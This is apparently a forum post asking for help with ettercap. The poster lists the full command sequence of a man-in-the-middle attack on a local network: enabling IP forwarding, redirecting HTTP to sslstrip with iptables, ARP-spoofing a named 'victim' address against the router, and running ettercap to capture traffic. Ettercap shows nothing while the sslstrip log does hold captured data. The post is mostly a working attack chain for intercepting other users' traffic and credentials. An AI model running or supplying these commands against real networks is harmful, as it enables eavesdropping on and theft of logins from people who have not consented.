I'm stuck with ettercap....it won't catch anything...(but i can see everything inside log_ssl)
here's what i do:
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
sslstrip -l 10000 -w log_ssl -p -a
arpspoof -i eth0 -t 192.168.2.9 192.168.2.1 (192.168.2.9 is the victim,192.168.2.1 is the router, and YES, they are correct!)
ettercap -T -q -i eth0
I've uncommented the 2 "if you use iptables..." in etter.conf.
I can't get any data inside the window running ettercap, but if I "cat" the log of sslstrip i can see data).